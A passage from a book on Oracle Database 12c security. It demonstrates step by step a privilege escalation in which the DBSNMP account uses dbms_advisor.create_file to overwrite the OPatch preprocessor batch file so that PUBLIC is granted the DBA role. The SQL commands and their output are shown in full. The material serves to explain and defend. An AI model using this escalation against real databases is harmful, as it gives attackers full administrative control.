Security Issues in 12c - Protecting Oracle Database 12c

Database Reference

In-Depth Information

This command confirms PUBLIC does not have DBA:

SQL> revoke dba from public;

revoke dba from public

*

ERROR at line 1:

ORA-01031: insufficient privileges

SQL> exec dbms_advisor.create_file ('grant dba to public;', 'OPATCH_SCRIPT_DIR','grant.sql');

PL/SQL procedure successfully completed.

SQL> exec dbms_advisor.create_file ('C:\app\abfb378\product\12.1.0\dbhome_1\BIN\sqlplus / as sysdba

@C:\app\abfb378\product\12.1\dbhome_1\QOpatch\grant.sql', 'OPATCH_SCRIPT_DIR','qopiprep.bat');

PL/SQL procedure successfully completed.

SQL> desc sys.OPATCH_XML_INV

Name Null? Type

----------------------------------------- -------- ----------------------------

XML_INVENTORY CLOB

SQL> select * from sys.OPATCH_XML_INV;

ERROR:

ORA-29913: error in executing ODCIEXTTABLEFETCH callout

ORA-29400: data cartridge error

KUP-04095: preprocessor command

C:\app\abfb378\product\12.1.0\dbhome_1/QOpatch\qopiprep.bat encountered error

"Error 45 initializing SQL*Plus

Internal error

"

no rows selected

SQL> select granted_role from dba_role_privs where grantee='PUBLIC';

GRANTED_ROLE

--------------------------------------------------------------------------------

DBA

PUBLIC now does have DBA.

So DBSNMP has granted DBA to PUBLIC. I chose DBSNMP as it is granted the ADVISOR system privilege by

default. DBSNMP is also the default account for cloud control, which is widely used and possibly the most important

subject for an Enterprise Oracle Security person to understand. There is a whole chapter coming up on this subject.

What other privilege escalations are there, related to directories, affecting *nix? *nix implementations of UTL_FILE

tightly control the ability to execute OS files, and as long as the *nix permissions never include both write and execute

then it is difficult for a low-privilege DB user to execute their own code on the OS. This is even the case with the

OPATCH_XML_INV external table pointing to QOpatch directory, where the parent directory actually has RWX. This

should mean that the contents of the directory can be renamed due to the parent directory permissions using

utl_file.frename —but UTL_FILE does not follow directory permission on *nix, as it only implements the file

permissions and completely disregards the *nix directory permissions. This is an example of Oracle interpreting

*nix security.

Search WWH ::

Custom Search

Home